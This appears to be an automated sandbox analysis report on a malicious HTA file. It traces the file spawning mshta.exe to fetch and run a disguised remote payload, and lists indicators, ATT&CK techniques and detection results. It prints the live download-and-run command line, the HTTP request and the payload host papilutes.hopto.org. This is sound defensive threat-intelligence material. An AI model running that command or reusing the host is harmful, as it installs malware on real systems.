
Windows Analysis Report
2-12749-25_21.04.2025.HTA.hta

Overview

General Information

Sample name: 2-12749-25_21.04.2025.HTA.hta
Analysis ID: 1671026
MD5: d8eb78d2145229db1a588a24cf632985
SHA1: 17c5a033e6d0f99218b0d0bb6a18b6aed3e0a9c3
SHA256: 341435e34c6d146cbb28f4e7de6d2e0e2b7ec2be3625f14a56041124f4af34cd
Tags: 193-124-22-113, hta, papilutes, please-clinton-missed-ing, user-JAMESWT_WT

Detection

Score: 2
Range: 0 - 100
Confidence: 60%

Signatures

Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

Classification chart (image not included): axes Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean, suspicious, malicious.
  • System is w10x64
  • mshta.exe (PID: 7220 cmdline: mshta.exe "C:\Users\user\Desktop\2-12749-25_21.04.2025.HTA.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • mshta.exe (PID: 2004 cmdline: "C:\Windows\system32\mshta.exe" http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx MD5: 06B02D5C097C7DB1F109749C45F3F505)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


Source: global traffic | HTTP traffic detected:
    GET /Gurukr/cableW2l/comparableKrE.pptx HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: papilutes.hopto.org
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: papilutes.hopto.org
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: http://papilutes.hopto.org
Source: mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294739881.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l
Source: mshta.exe, 00000001.00000002.2522777705.0000000003194000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx
Source: mshta.exe, 00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx=
Source: mshta.exe, 00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx?
Source: mshta.exe, 00000000.00000002.1294457111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.2522741582.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.2522777705.0000000003110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxC:
Source: mshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxN
Source: mshta.exe, 00000001.00000002.2522588226.0000000000AA9000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxd
Source: mshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxl
Source: mshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxm
Source: mshta.exe, 00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxy.IE5R;
Source: mshta.exe, 00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScriptX
Source: mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwE
Source: mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwE3PM41zeMBWfPn
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwEB
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: https://passport.i.ua/login/?
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: https://regnum.ru/foreign/eastern-europe/ukraine.html
Source: mshta.exe, 00000000.00000003.1288694322.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000780000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://regnum.ru/foreign/eastern-europe/ukraine.htmlHTA.hta#
Source: mshta.exe, 00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.0000000000751000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: https://t.me/
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/G
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: https://www.bbc.com/
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: https://www.crimea.kp.ru/daily/euromaidan/
Source: mshta.exe, 00000000.00000003.1288694322.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000780000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.crimea.kp.ru/daily/euromaidan/x
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: https://www.rbc.ru/tags/?tag=
Source: mshta.exe, 00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: https://www.ukr.net/
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ukr.net/o
Source: mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294722604.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC8000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.hta | String found in binary or memory: https://www.unian.net/
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: clean2.winHTA@3/0@1/1
Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\comparableKrE[1].ps
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\2-12749-25_21.04.2025.HTA.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\system32\mshta.exe" http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe | Window / User API: threadDelayed 7467
Source: mshta.exe, 00000001.00000002.2522777705.00000000031A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWC
Source: mshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.2522777705.00000000031A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
MITRE ATT&CK matrix (tactic: matched technique, with the number of matches reported per technique)
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: Process Injection (11); DLL Side-Loading (1)
  • Defense Evasion: Masquerading (1); Process Injection (11); DLL Side-Loading (1)
  • Discovery: Security Software Discovery (1); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (2)
  • Collection: Email Collection (1)
  • Command and Control: Non-Application Layer Protocol (2); Application Layer Protocol (12); Ingress Tool Transfer (1)
  • No technique matched under Reconnaissance, Resource Development, Initial Access, Execution, Credential Access, Lateral Movement, Exfiltration or Impact.
Behavior graph (ID 1671026; image not included)
  • Sample: 2-12749-25_21.04.2025.HTA.hta
  • Start date: 22/04/2025
  • Architecture: WINDOWS
  • Score: 2
  • Process chain: the sample starts mshta.exe, which starts a second mshta.exe
  • DNS/IP: papilutes.hopto.org resolves to 193.124.22.113 (ETOP-ASPL, Russian Federation); the second mshta.exe connects from local port 49689 to port 80
The graph legend marks processes, signatures, created files, DNS/IP info, dropped files, Windows processes, the number of created registry values and files, the language (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), malicious nodes and internet access.

Antivirus detection (sample)
  • 2-12749-25_21.04.2025.HTA.hta: ReversingLabs 3% (Win32.Trojan.Generic); Virustotal 5%
No Antivirus matches
No Antivirus matches
No Antivirus matches

URL scan results (Avira URL Cloud)
  • http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxl: 0%, safe
  • http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx: 0%, safe
  • http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx=: 0%, safe
  • http://papilutes.hopto.org: 0%, safe
  • http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxd: 0%, safe
